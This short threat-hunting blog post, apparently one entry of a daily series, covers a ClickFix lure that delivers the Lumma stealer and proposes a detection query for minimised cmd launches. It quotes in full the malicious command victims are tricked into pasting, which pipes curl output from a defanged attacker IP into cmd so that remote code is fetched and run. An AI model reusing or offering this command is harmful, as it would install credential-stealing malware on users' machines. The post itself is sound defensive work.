247. Another Hunting Opportunity from ClickFix

Hello everyone! We already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we can get more and more detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command: cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585 Here we can see that the adversary used command line arguments to start download process with the new window minimized. You won't see it very often to be used in legitimate way, so we can use it to create a hunting query: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min") See you tomorrow!